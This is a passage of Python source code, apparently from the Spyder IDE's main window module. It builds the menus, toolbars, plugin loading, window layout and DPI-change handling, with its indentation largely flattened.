triggered=self.show_preferences,
context=Qt.ApplicationShortcut)
self.register_shortcut(prefs_action, "_", "Preferences",
add_shortcut_to_tip=True)
spyder_path_action = create_action(self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.show_path_manager,
tip=_("Python Path Manager"),
menurole=QAction.ApplicationSpecificRole)
reset_spyder_action = create_action(
self, _("Reset Spyder to factory defaults"),
triggered=self.reset_spyder)
self.tools_menu_actions = [prefs_action, spyder_path_action]
if WinUserEnvDialog is not None:
winenv_action = create_action(self,
_("Current user environment variables..."),
icon='win_env.png',
tip=_("Show and edit current user environment "
"variables in Windows registry "
"(i.e. for all sessions)"),
triggered=self.win_env)
self.tools_menu_actions.append(winenv_action)
from spyder.plugins.completion.kite.utils.install import (
check_if_kite_installed)
is_kite_installed, kite_path = check_if_kite_installed()
if not is_kite_installed:
install_kite_action = create_action(
self, _("Install Kite completion engine"),
icon=get_icon('kite', adjust_for_interface=True),
triggered=self.show_kite_installation)
self.tools_menu_actions.append(install_kite_action)
self.tools_menu_actions += [MENU_SEPARATOR, reset_spyder_action]
if get_debug_level() >= 3:
self.menu_lsp_logs = QMenu(_("LSP logs"))
self.menu_lsp_logs.aboutToShow.connect(self.update_lsp_logs)
self.tools_menu_actions += [self.menu_lsp_logs]
# External Tools submenu
self.external_tools_menu = QMenu(_("External Tools"))
self.external_tools_menu_actions = []
# WinPython control panel
self.wp_action = create_action(self, _("WinPython control panel"),
icon=get_icon('winpython.svg'),
triggered=lambda:
programs.run_python_script('winpython', 'controlpanel'))
if os.name == 'nt' and is_module_installed('winpython'):
self.external_tools_menu_actions.append(self.wp_action)
# Qt-related tools
additact = []
for name in ("designer-qt4", "designer"):
qtdact = create_program_action(self, _("Qt Designer"), name)
if qtdact:
break
        for name in ("linguist-qt4", "linguist"):
            qtlact = create_program_action(self, _("Qt Linguist"), name)
            if qtlact:
                break
args = ['-no-opengl'] if os.name == 'nt' else []
for act in (qtdact, qtlact):
if act:
additact.append(act)
if additact and is_module_installed('winpython'):
self.external_tools_menu_actions += [None] + additact
# Guidata and Sift
logger.info("Creating guidata and sift entries...")
gdgq_act = []
# Guidata and Guiqwt don't support PyQt5 yet and they fail
# with an AssertionError when imported using those bindings
# (see spyder-ide/spyder#2274)
try:
from guidata import configtools
from guidata import config # analysis:ignore
guidata_icon = configtools.get_icon('guidata.svg')
guidata_act = create_python_script_action(self,
_("guidata examples"), guidata_icon,
"guidata",
osp.join("tests", "__init__"))
gdgq_act += [guidata_act]
        except Exception:
            pass
try:
from guidata import configtools
from guiqwt import config # analysis:ignore
guiqwt_icon = configtools.get_icon('guiqwt.svg')
guiqwt_act = create_python_script_action(self,
_("guiqwt examples"), guiqwt_icon, "guiqwt",
osp.join("tests", "__init__"))
if guiqwt_act:
gdgq_act += [guiqwt_act]
sift_icon = configtools.get_icon('sift.svg')
sift_act = create_python_script_action(self, _("Sift"),
sift_icon, "guiqwt", osp.join("tests", "sift"))
if sift_act:
gdgq_act += [sift_act]
        except Exception:
            pass
if gdgq_act:
self.external_tools_menu_actions += [None] + gdgq_act
# Maximize current plugin
self.maximize_action = create_action(self, '',
triggered=self.maximize_dockwidget,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.maximize_action, "_", "Maximize pane")
self.__update_maximize_action()
# Fullscreen mode
self.fullscreen_action = create_action(self,
_("Fullscreen mode"),
triggered=self.toggle_fullscreen,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.fullscreen_action, "_",
"Fullscreen mode", add_shortcut_to_tip=True)
# Main toolbar
self.main_toolbar_actions = [self.maximize_action,
self.fullscreen_action,
None,
prefs_action, spyder_path_action]
self.main_toolbar = self.create_toolbar(_("Main toolbar"),
"main_toolbar")
# Switcher instance
logger.info("Loading switcher...")
self.create_switcher()
# Internal console plugin
message = _(
"Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"
)
CONF.set('internal_console', 'message', message)
CONF.set('internal_console', 'multithreaded', self.multithreaded)
CONF.set('internal_console', 'profile', self.profile)
CONF.set('internal_console', 'commands', [])
CONF.set('internal_console', 'namespace', {})
CONF.set('internal_console', 'show_internal_errors', True)
from spyder.plugins.console.plugin import Console
self.console = Console(self, configuration=CONF)
self.console.set_exit_function(self.closing)
self.register_plugin(self.console)
# TODO: Load and register the rest of the plugins using new API
# Run plugin
from spyder.plugins.run.plugin import Run
self.run = Run(self, configuration=CONF)
self.register_plugin(self.run)
# Appearance plugin
from spyder.plugins.appearance.plugin import Appearance
self.appearance = Appearance(self, configuration=CONF)
self.register_plugin(self.appearance)
# Code completion client initialization
self.set_splash(_("Starting code completion manager..."))
from spyder.plugins.completion.manager.plugin import CompletionManager
self.completions = CompletionManager(self)
# Outline explorer widget
if CONF.get('outline_explorer', 'enable'):
self.set_splash(_("Loading outline explorer..."))
from spyder.plugins.outlineexplorer.plugin import OutlineExplorer
self.outlineexplorer = OutlineExplorer(self)
self.outlineexplorer.register_plugin()
self.add_plugin(self.outlineexplorer)
if is_anaconda():
from spyder.widgets.status import CondaStatus
self.conda_status = CondaStatus(self, status,
icon=ima.icon('environment'))
self.conda_status.update_interpreter(self.get_main_interpreter())
# Editor plugin
self.set_splash(_("Loading editor..."))
from spyder.plugins.editor.plugin import Editor
self.editor = Editor(self)
self.editor.register_plugin()
self.add_plugin(self.editor)
# Start code completion client
self.set_splash(_("Launching code completion client for Python..."))
self.completions.start()
self.completions.start_client(language='python')
# Populating file menu entries
quit_action = create_action(self, _("&Quit"),
icon=ima.icon('exit'),
tip=_("Quit"),
triggered=self.console.quit,
context=Qt.ApplicationShortcut)
self.register_shortcut(quit_action, "_", "Quit")
restart_action = create_action(self, _("&Restart"),
icon=ima.icon('restart'),
tip=_("Restart"),
triggered=self.restart,
context=Qt.ApplicationShortcut)
self.register_shortcut(restart_action, "_", "Restart")
file_actions = [
self.file_switcher_action,
self.symbol_finder_action,
None,
]
if sys.platform == 'darwin':
file_actions.extend(self.editor.tab_navigation_actions + [None])
file_actions.extend([restart_action, quit_action])
self.file_menu_actions += file_actions
self.set_splash("")
# Namespace browser
self.set_splash(_("Loading namespace browser..."))
from spyder.plugins.variableexplorer.plugin import VariableExplorer
self.variableexplorer = VariableExplorer(self)
self.variableexplorer.register_plugin()
self.add_plugin(self.variableexplorer)
# IPython console
self.set_splash(_("Loading IPython console..."))
from spyder.plugins.ipythonconsole.plugin import IPythonConsole
self.ipyconsole = IPythonConsole(self, css_path=css_path)
self.ipyconsole.register_plugin()
self.add_plugin(self.ipyconsole)
# Help plugin
# TODO: There is a circular dependency between help and ipython since
# ipython console uses css_path.
if CONF.get('help', 'enable'):
CONF.set('help', 'css_path', css_path)
from spyder.plugins.help.plugin import Help
self.help = Help(self, configuration=CONF)
self.register_plugin(self.help)
# History log widget
if CONF.get('historylog', 'enable'):
from spyder.plugins.history.plugin import HistoryLog
self.historylog = HistoryLog(self, configuration=CONF)
self.register_plugin(self.historylog)
# Figure browser
self.set_splash(_("Loading figure browser..."))
from spyder.plugins.plots.plugin import Plots
self.plots = Plots(self, configuration=CONF)
self.register_plugin(self.plots)
# Explorer
if CONF.get('explorer', 'enable'):
self.set_splash(_("Loading file explorer..."))
from spyder.plugins.explorer.plugin import Explorer
self.explorer = Explorer(self)
self.explorer.register_plugin()
self.add_plugin(self.explorer)
# Online help widget
if CONF.get('onlinehelp', 'enable'):
from spyder.plugins.onlinehelp.plugin import OnlineHelp
self.onlinehelp = OnlineHelp(self, configuration=CONF)
self.register_plugin(self.onlinehelp)
# Project explorer widget
self.set_splash(_("Loading project explorer..."))
from spyder.plugins.projects.plugin import Projects
self.projects = Projects(self)
self.projects.register_plugin()
self.project_path = self.projects.get_pythonpath(at_start=True)
self.add_plugin(self.projects)
# Working directory plugin
from spyder.plugins.workingdirectory.plugin import WorkingDirectory
CONF.set('workingdir', 'init_workdir', self.init_workdir)
self.workingdirectory = WorkingDirectory(self, configuration=CONF)
self.register_plugin(self.workingdirectory)
# Find in files
if CONF.get('find_in_files', 'enable'):
from spyder.plugins.findinfiles.plugin import FindInFiles
self.findinfiles = FindInFiles(self, configuration=CONF)
self.register_plugin(self.findinfiles)
# Load other plugins (former external plugins)
        # TODO: Use this loop to load all internal plugins and remove
        # duplicated code
# Breakpoints
if CONF.get('breakpoints', 'enable'):
from spyder.plugins.breakpoints.plugin import Breakpoints
self.breakpoints = Breakpoints(self, configuration=CONF)
self.register_plugin(self.breakpoints)
self.thirdparty_plugins.append(self.breakpoints)
# Profiler plugin
if CONF.get('profiler', 'enable'):
from spyder.plugins.profiler.plugin import Profiler
self.profiler = Profiler(self, configuration=CONF)
self.register_plugin(self.profiler)
self.thirdparty_plugins.append(self.profiler)
other_plugins = ['pylint']
for plugin_name in other_plugins:
if CONF.get(plugin_name, 'enable'):
module = importlib.import_module(
'spyder.plugins.{}'.format(plugin_name))
plugin = module.PLUGIN_CLASS(self)
if plugin.check_compatibility()[0]:
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
self.add_plugin(plugin)
# Third-party plugins
from spyder import dependencies
self.set_splash(_("Loading third-party plugins..."))
for mod in get_spyderplugins_mods():
try:
plugin = mod.PLUGIN_CLASS(self)
if plugin.check_compatibility()[0]:
if hasattr(plugin, 'COMPLETION_CLIENT_NAME'):
self.completions.register_completion_plugin(plugin)
else:
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
# Add to dependencies dialog
module = mod.__name__
name = module.replace('_', '-')
if plugin.DESCRIPTION:
description = plugin.DESCRIPTION
else:
description = plugin.get_plugin_title()
dependencies.add(module, name, description,
'', None, kind=dependencies.PLUGIN)
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
# New API: Load and register external plugins
external_plugins = find_external_plugins()
plugin_deps = solve_plugin_dependencies(external_plugins.values())
for plugin_class in plugin_deps:
if issubclass(plugin_class, SpyderPluginV2):
try:
plugin_instance = plugin_class(
self,
configuration=CONF,
)
self.register_plugin(plugin_instance, external=True)
# These attributes come from spyder.app.solver
module = plugin_class._spyder_module_name
package_name = plugin_class._spyder_package_name
version = plugin_class._spyder_version
description = plugin_instance.get_description()
dependencies.add(module, package_name, description,
version, None, kind=dependencies.PLUGIN)
except Exception as error:
print("%s: %s" % (plugin_class, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
self.set_splash(_("Setting up main window..."))
# Help menu
trouble_action = create_action(self,
_("Troubleshooting..."),
triggered=self.trouble_guide)
dep_action = create_action(self, _("Dependencies..."),
triggered=self.show_dependencies,
icon=ima.icon('advanced'))
report_action = create_action(self,
_("Report issue..."),
icon=ima.icon('bug'),
triggered=self.report_issue)
support_action = create_action(self,
_("Spyder support..."),
triggered=self.google_group)
self.check_updates_action = create_action(self,
_("Check for updates..."),
triggered=self.check_updates)
# Spyder documentation
spyder_doc = 'https://docs.spyder-ide.org/'
doc_action = create_action(self, _("Spyder documentation"),
icon=ima.icon('DialogHelpButton'),
triggered=lambda:
programs.start_file(spyder_doc))
self.register_shortcut(doc_action, "_",
"spyder documentation")
if self.help is not None:
tut_action = create_action(self, _("Spyder tutorial"),
triggered=self.help.show_tutorial)
else:
tut_action = None
#----- Tours
self.tour = tour.AnimatedTour(self)
self.tours_menu = QMenu(_("Interactive tours"), self)
self.tour_menu_actions = []
        # TODO: Only show the intro tour for now. When we are close to
        # finishing 3.0, we will complete and show the other tours
self.tours_available = tour.get_tours(0)
for i, tour_available in enumerate(self.tours_available):
self.tours_available[i]['last'] = 0
tour_name = tour_available['name']
def trigger(i=i, self=self): # closure needed!
return lambda: self.show_tour(i)
temp_action = create_action(self, tour_name, tip="",
triggered=trigger())
self.tour_menu_actions += [temp_action]
self.tours_menu.addActions(self.tour_menu_actions)
self.help_menu_actions = [
doc_action,
tut_action,
# shortcuts_action,
self.tours_menu,
MENU_SEPARATOR,
trouble_action,
report_action, dep_action,
self.check_updates_action,
support_action,
MENU_SEPARATOR,
]
# Python documentation
if get_python_doc_path() is not None:
pydoc_act = create_action(self, _("Python documentation"),
triggered=lambda:
programs.start_file(get_python_doc_path()))
self.help_menu_actions.append(pydoc_act)
# IPython documentation
if self.help is not None:
ipython_menu = QMenu(_("IPython documentation"), self)
intro_action = create_action(self, _("Intro to IPython"),
triggered=self.ipyconsole.show_intro)
quickref_action = create_action(self, _("Quick reference"),
triggered=self.ipyconsole.show_quickref)
guiref_action = create_action(self, _("Console help"),
triggered=self.ipyconsole.show_guiref)
add_actions(ipython_menu, (intro_action, guiref_action,
quickref_action))
self.help_menu_actions.append(ipython_menu)
# Windows-only: documentation located in sys.prefix/Doc
ipm_actions = []
def add_ipm_action(text, path):
"""Add installed Python module doc action to help submenu"""
# QAction.triggered works differently for PySide and PyQt
path = file_uri(path)
if not API == 'pyside':
slot=lambda _checked, path=path: programs.start_file(path)
else:
slot=lambda path=path: programs.start_file(path)
action = create_action(self, text,
icon='%s.png' % osp.splitext(path)[1][1:],
triggered=slot)
ipm_actions.append(action)
sysdocpth = osp.join(sys.prefix, 'Doc')
if osp.isdir(sysdocpth): # exists on Windows, except frozen dist.
for docfn in os.listdir(sysdocpth):
pt = r'([a-zA-Z\_]*)(doc)?(-dev)?(-ref)?(-user)?.(chm|pdf)'
match = re.match(pt, docfn)
if match is not None:
pname = match.groups()[0]
if pname not in ('Python', ):
add_ipm_action(pname, osp.join(sysdocpth, docfn))
# Installed Python modules submenu (Windows only)
if ipm_actions:
pymods_menu = QMenu(_("Installed Python modules"), self)
add_actions(pymods_menu, ipm_actions)
self.help_menu_actions.append(pymods_menu)
# Online documentation
web_resources = QMenu(_("Online documentation"), self)
webres_actions = create_module_bookmark_actions(self,
self.BOOKMARKS)
webres_actions.insert(2, None)
webres_actions.insert(5, None)
webres_actions.insert(8, None)
add_actions(web_resources, webres_actions)
self.help_menu_actions.append(web_resources)
# Qt assistant link
if sys.platform.startswith('linux') and not PYQT5:
qta_exe = "assistant-qt4"
else:
qta_exe = "assistant"
qta_act = create_program_action(self, _("Qt documentation"),
qta_exe)
if qta_act:
self.help_menu_actions += [qta_act, None]
# About Spyder
about_action = create_action(self,
_("About %s...") % "Spyder",
icon=ima.icon('MessageBoxInformation'),
triggered=self.show_about)
self.help_menu_actions += [MENU_SEPARATOR, about_action]
# Status bar widgets
from spyder.widgets.status import MemoryStatus, CPUStatus, ClockStatus
self.mem_status = MemoryStatus(self, status)
self.cpu_status = CPUStatus(self, status)
self.clock_status = ClockStatus(self, status)
self.apply_statusbar_settings()
# ----- View
# View menu
self.plugins_menu = QMenu(_("Panes"), self)
self.toolbars_menu = QMenu(_("Toolbars"), self)
self.quick_layout_menu = QMenu(_("Window layouts"), self)
self.quick_layout_set_menu()
self.view_menu.addMenu(self.plugins_menu) # Panes
add_actions(self.view_menu, (self.lock_interface_action,
self.close_dockwidget_action,
self.maximize_action,
MENU_SEPARATOR))
self.show_toolbars_action = create_action(self,
_("Show toolbars"),
triggered=self.show_toolbars,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.show_toolbars_action, "_",
"Show toolbars")
self.view_menu.addMenu(self.toolbars_menu)
self.view_menu.addAction(self.show_toolbars_action)
add_actions(self.view_menu, (MENU_SEPARATOR,
self.quick_layout_menu,
self.toggle_previous_layout_action,
self.toggle_next_layout_action,
MENU_SEPARATOR,
self.fullscreen_action))
if set_attached_console_visible is not None:
cmd_act = create_action(self,
_("Attached console window (debugging)"),
toggled=set_attached_console_visible)
cmd_act.setChecked(is_attached_console_visible())
add_actions(self.view_menu, (MENU_SEPARATOR, cmd_act))
# Adding external tools action to "Tools" menu
if self.external_tools_menu_actions:
external_tools_act = create_action(self, _("External Tools"))
external_tools_act.setMenu(self.external_tools_menu)
self.tools_menu_actions += [None, external_tools_act]
# Filling out menu/toolbar entries:
add_actions(self.file_menu, self.file_menu_actions)
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
add_actions(self.consoles_menu, self.consoles_menu_actions)
add_actions(self.projects_menu, self.projects_menu_actions)
add_actions(self.tools_menu, self.tools_menu_actions)
add_actions(self.external_tools_menu,
self.external_tools_menu_actions)
add_actions(self.help_menu, self.help_menu_actions)
add_actions(self.main_toolbar, self.main_toolbar_actions)
add_actions(self.file_toolbar, self.file_toolbar_actions)
add_actions(self.edit_toolbar, self.edit_toolbar_actions)
add_actions(self.search_toolbar, self.search_toolbar_actions)
add_actions(self.source_toolbar, self.source_toolbar_actions)
add_actions(self.debug_toolbar, self.debug_toolbar_actions)
add_actions(self.run_toolbar, self.run_toolbar_actions)
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
# Window set-up
logger.info("Setting up window...")
self.setup_layout(default=False)
if self.splash is not None:
self.splash.hide()
# Enabling tear off for all menus except help menu
if CONF.get('main', 'tear_off_menus'):
for child in self.menuBar().children():
if isinstance(child, QMenu) and child != self.help_menu:
child.setTearOffEnabled(True)
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
child.aboutToShow.connect(self.update_search_menu)
except TypeError:
pass
logger.info("*** End of MainWindow setup ***")
self.is_starting_up = False
for plugin, plugin_instance in self._EXTERNAL_PLUGINS.items():
self.tabify_plugin(plugin_instance)
plugin_instance.toggle_view(False)
def setup_menus(self):
"""Setup menus."""
# Update menus list
default_menus = [self.file_menu, self.edit_menu, self.search_menu,
self.source_menu, self.run_menu, self.debug_menu,
self.consoles_menu, self.projects_menu,
self.tools_menu, self.view_menu, self.help_menu]
self.menus = self.menus + default_menus
# Show and hide shortcuts and icons in menus for macOS
if sys.platform == 'darwin':
for menu in self.menus:
if menu is not None:
menu.aboutToShow.connect(
lambda menu=menu: self.show_shortcuts(menu))
menu.aboutToHide.connect(
lambda menu=menu: self.hide_shortcuts(menu))
menu.aboutToShow.connect(
lambda menu=menu: set_menu_icons(menu, False))
menu.aboutToShow.connect(self.hide_options_menus)
def update_lsp_logs(self):
"""Create an action for each lsp log file."""
self.menu_lsp_logs.clear()
lsp_logs = []
regex = re.compile(r'.*_.*_(\d+)[.]log')
files = glob.glob(osp.join(get_conf_path('lsp_logs'), '*.log'))
for f in files:
action = create_action(self, f, triggered=self.editor.load)
action.setData(f)
lsp_logs.append(action)
add_actions(self.menu_lsp_logs, lsp_logs)
def post_visible_setup(self):
"""Actions to be performed only after the main window's `show` method
was triggered"""
for plugin_id, plugin in self._PLUGINS.items():
try:
plugin.on_mainwindow_visible()
except AttributeError:
pass
self.restore_scrollbar_position.emit()
logger.info('Deleting previous Spyder instance LSP logs...')
delete_lsp_log_files()
# Workaround for spyder-ide/spyder#880.
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow,
# then set them again as floating windows here.
for widget in self.floating_dockwidgets:
widget.setFloating(True)
        # In Mac OS X 10.7 our app is not displayed after being initialized
        # (I don't know why because this doesn't happen when started from
        # the terminal), so we need to resort to this hack to make it appear.
if running_in_mac_app():
idx = __file__.index(MAC_APP_NAME)
app_path = __file__[:idx]
subprocess.call(['open', app_path + MAC_APP_NAME])
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if (CONF.get('main', 'single_instance') and not self.new_instance
and self.open_files_server):
t = threading.Thread(target=self.start_open_files_server)
t.setDaemon(True)
t.start()
        # Connect the window to the signal emitted by the previous server
        # when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Create Plugins and toolbars submenus
self.create_plugins_menu()
self.create_toolbars_menu()
# Update toolbar visibility status
self.toolbars_visible = CONF.get('main', 'toolbars_visible')
self.load_last_visible_toolbars()
# Update lock status
self.toggle_lock(self.interface_locked)
# Hide Internal Console so that people don't use it instead of
# the External or IPython ones
if self.console.dockwidget.isVisible() and DEV is None:
self.console.toggle_view_action.setChecked(False)
self.console.dockwidget.hide()
# Show Help and Consoles by default
plugins_to_show = [self.ipyconsole]
if self.help is not None:
plugins_to_show.append(self.help)
for plugin in plugins_to_show:
if plugin.dockwidget.isVisible():
plugin.dockwidget.raise_()
# Show history file if no console is visible
if not self.ipyconsole._isvisible:
self.historylog.add_history(get_conf_path('history.py'))
if self.open_project:
self.projects.open_project(self.open_project)
else:
# Load last project if a project was active when Spyder
# was closed
self.projects.reopen_last_project()
# If no project is active, load last session
if self.projects.get_active_project() is None:
self.editor.setup_open_files(close_previous_files=False)
# Connect Editor to Kite completions plugin status
self.editor.kite_completions_file_status()
# Connect Editor debug action with Console
self.ipyconsole.sig_pdb_state.connect(self.editor.update_pdb_state)
# Setup menus
self.setup_menus()
# Check for spyder updates
if DEV is None and CONF.get('main', 'check_updates_on_startup'):
self.give_updates_feedback = False
self.check_updates(startup=True)
# Show dialog with missing dependencies
if not running_under_pytest():
self.report_missing_dependencies()
# Raise the menuBar to the top of the main window widget's stack
# Fixes spyder-ide/spyder#3887.
self.menuBar().raise_()
        # Handle DPI scale and window changes to show a restart message.
# Don't activate this functionality on macOS because it's being
# triggered in the wrong situations.
# See spyder-ide/spyder#11846
if not sys.platform == 'darwin':
window = self.window().windowHandle()
window.screenChanged.connect(self.handle_new_screen)
self.screen = self.window().windowHandle().screen()
self.current_dpi = self.screen.logicalDotsPerInch()
self.screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
# Notify that the setup of the mainwindow was finished
self.is_setting_up = False
self.sig_setup_finished.emit()
def handle_new_screen(self, screen):
"""Connect DPI signals for new screen."""
try:
self.screen.logicalDotsPerInchChanged.disconnect(
self.show_dpi_change_message)
except (TypeError, RuntimeError):
# See spyder-ide/spyder#11903 and spyder-ide/spyder#11997
pass
self.screen = screen
self.screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
if self.current_dpi != screen.logicalDotsPerInch():
self.show_dpi_change_message(screen.logicalDotsPerInch())
def show_dpi_change_message(self, dpi):
"""Show message to restart Spyder since the DPI scale changed."""
self.screen.logicalDotsPerInchChanged.disconnect(
self.show_dpi_change_message)
if self.current_dpi == dpi:
# Reconnect DPI scale changes to show a restart message
self.screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
return
if not self.show_dpi_message:
return
# Check the window state to not show the message if the window
# is in fullscreen mode.
window = self.window().windowHandle()
if (window.windowState() == Qt.WindowFullScreen and
sys.platform == 'darwin'):
return
dismiss_box = QCheckBox(
_("Hide this message during the current session")
)
msgbox = QMessageBox(self)
msgbox.setIcon(QMessageBox.Warning)
msgbox.setText(
_("A monitor scale change was detected. <br><br>"
"We recommend restarting Spyder to ensure that it's properly "
"displayed. If you don't want to do that, please be sure to "
"activate the option<br><br><tt>Enable auto high DPI scaling"
"</tt><br><br>in <tt>Preferences > General > Interface</tt>, "
"in case Spyder is not displayed correctly.<br><br>"
"Do you want to restart Spyder?"))
restart_button = msgbox.addButton(_('Restart now'), QMessageBox.NoRole)
dismiss_button = msgbox.addButton(_('Dismiss'), QMessageBox.NoRole)
msgbox.setCheckBox(dismiss_box)
msgbox.setDefaultButton(dismiss_button)
msgbox.exec_()
if dismiss_box.isChecked():
self.show_dpi_message = False
if msgbox.clickedButton() == restart_button:
            # Activate the HDPI auto-scaling option since it's needed for a
            # proper display when using OS scaling
CONF.set('main', 'normal_screen_resolution', False)
CONF.set('main', 'high_dpi_scaling', True)
CONF.set('main', 'high_dpi_custom_scale_factor', False)
self.restart()
else:
# Reconnect DPI scale changes to show a restart message
# also update current dpi for future checks
self.current_dpi = dpi
self.screen.logicalDotsPerInchChanged.connect(
self.show_dpi_change_message)
def set_window_title(self):
"""Set window title."""
if DEV is not None:
title = u"Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
else:
title = u"Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if get_debug_level():
title += u" [DEBUG MODE %d]" % get_debug_level()
if self.window_title is not None:
title += u' -- ' + to_text_string(self.window_title)
if self.projects is not None:
path = self.projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), u'~')
title = u'{0} - {1}'.format(path, title)
self.base_title = title
self.setWindowTitle(self.base_title)
def report_missing_dependencies(self):
"""Show a QMessageBox with a list of missing hard dependencies"""
# Declare dependencies before trying to detect the missing ones
dependencies.declare_dependencies()
missing_deps = dependencies.missing_dependencies()
if missing_deps:
            # We change '<br>' by '\n', in order to replace the '<'
            # that appear in our deps by '&lt;' (to not break html
            # formatting) and finally we restore '<br>' again.
            missing_deps = (missing_deps.replace('<br>', '\n').
                            replace('<', '&lt;').replace('\n', '<br>'))
QMessageBox.critical(self, _('Error'),
_("<b>You have missing dependencies!</b>"
"<br><br><tt>%s</tt><br>"
"<b>Please install them to avoid this message.</b>"
"<br><br>"
"<i>Note</i>: Spyder could work without some of these "
"dependencies, however to have a smooth experience when "
"using Spyder we <i>strongly</i> recommend you to install "
"all the listed missing dependencies.<br><br>"
"Failing to install these dependencies might result in bugs. "
"Please be sure that any found bugs are not the direct "
"result of missing dependencies, prior to reporting a new "
"issue."
) % missing_deps, QMessageBox.Ok)
def load_window_settings(self, prefix, default=False, section='main'):
"""Load window layout settings from userconfig-based configuration
with *prefix*, under *section*
default: if True, do not restore inner layout"""
get_func = CONF.get_default if default else CONF.get
window_size = get_func(section, prefix+'size')
prefs_dialog_size = get_func(section, prefix+'prefs_dialog_size')
if default:
hexstate = None
else:
hexstate = get_func(section, prefix+'state', None)
pos = get_func(section, prefix+'position')
# It's necessary to verify if the window/position value is valid
# with the current screen. See spyder-ide/spyder#3748.
width = pos[0]
height = pos[1]
screen_shape = QApplication.desktop().geometry()
current_width = screen_shape.width()
current_height = screen_shape.height()
if current_width < width or current_height < height:
pos = CONF.get_default(section, prefix+'position')
is_maximized = get_func(section, prefix+'is_maximized')
is_fullscreen = get_func(section, prefix+'is_fullscreen')
return hexstate, window_size, prefs_dialog_size, pos, is_maximized, \
is_fullscreen
def get_window_settings(self):
"""Return current window settings
Symetric to the 'set_window_settings' setter"""
window_size = (self.window_size.width(), self.window_size.height())
is_fullscreen = self.isFullScreen()
if is_fullscreen:
is_maximized = self.maximized_flag
else:
is_maximized = self.isMaximized()
pos = (self.window_position.x(), self.window_position.y())
prefs_dialog_size = (self.prefs_dialog_size.width(),
self.prefs_dialog_size.height())
hexstate = qbytearray_to_str(self.saveState())
return (hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen)
def set_window_settings(self, hexstate, window_size, prefs_dialog_size,
pos, is_maximized, is_fullscreen):
"""Set window settings
Symetric to the 'get_window_settings' accessor"""
self.setUpdatesEnabled(False)
self.window_size = QSize(window_size[0], window_size[1]) # width,height
self.prefs_dialog_size = QSize(prefs_dialog_size[0],
prefs_dialog_size[1]) # width,height
self.window_position = QPoint(pos[0], pos[1]) # x,y
self.setWindowState(Qt.WindowNoState)
self.resize(self.window_size)
self.move(self.window_position)
# Window layout
if hexstate:
            self.restoreState(QByteArray().fromHex(
                str(hexstate).encode('utf-8')))
# Workaround for spyder-ide/spyder#880.
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow.
for widget in self.children():
if isinstance(widget, QDockWidget) and widget.isFloating():
self.floating_dockwidgets.append(widget)
widget.setFloating(False)
# Is fullscreen?
if is_fullscreen:
self.setWindowState(Qt.WindowFullScreen)
self.__update_fullscreen_action()
# Is maximized?
if is_fullscreen:
self.maximized_flag = is_maximized
elif is_maximized:
self.setWindowState(Qt.WindowMaximized)
self.setUpdatesEnabled(True)
def save_current_window_settings(self, prefix, section='main',
none_state=False):
"""Save current window settings with *prefix* in
the userconfig-based configuration, under *section*"""
win_size = self.window_size
prefs_size = self.prefs_dialog_size
CONF.set(section, prefix+'size', (win_size.width(), win_size.height()))
CONF.set(section, prefix+'prefs_dialog_size',
(prefs_size.width(), prefs_size.height()))
CONF.set(section, prefix+'is_maximized', self.isMaximized())
CONF.set(section, prefix+'is_fullscreen', self.isFullScreen())
pos = self.window_position
CONF.set(section, prefix+'position', (pos.x(), pos.y()))
        self.maximize_dockwidget(restore=True)  # Restore non-maximized layout
if none_state:
CONF.set(section, prefix + 'state', None)
else:
qba = self.saveState()
CONF.set(section, prefix + 'state', qbytearray_to_str(qba))
CONF.set(section, prefix+'statusbar',
not self.statusBar().isHidden())
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets"""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
# --- Layouts
def setup_layout(self, default=False):
"""Setup window layout"""
prefix = 'window' + '/'
settings = self.load_window_settings(prefix, default)
hexstate = settings[0]
self.first_spyder_run = False
if hexstate is None:
# First Spyder execution:
self.setWindowState(Qt.WindowMaximized)
self.first_spyder_run = True
self.setup_default_layouts('default', settings)
# Now that the initial setup is done, copy the window settings,
# except for the hexstate in the quick layouts sections for the
# default layouts.
# Order and name of the default layouts is found in config.py
section = 'quick_layouts'
get_func = CONF.get_default if default else CONF.get
order = get_func(section, 'order')
# restore the original defaults if reset layouts is called
if default:
CONF.set(section, 'active', order)
CONF.set(section, 'order', order)
CONF.set(section, 'names', order)
            for index, name in enumerate(order):
prefix = 'layout_{0}/'.format(index)
self.save_current_window_settings(prefix, section,
none_state=True)
# store the initial layout as the default in spyder
prefix = 'layout_default/'
section = 'quick_layouts'
self.save_current_window_settings(prefix, section, none_state=True)
self.current_quick_layout = 'default'
# Regenerate menu
self.quick_layout_set_menu()
self.set_window_settings(*settings)
# Old API
for plugin in (self.widgetlist + self.thirdparty_plugins):
try:
plugin._initialize_plugin_in_mainwindow_layout()
except AttributeError:
pass
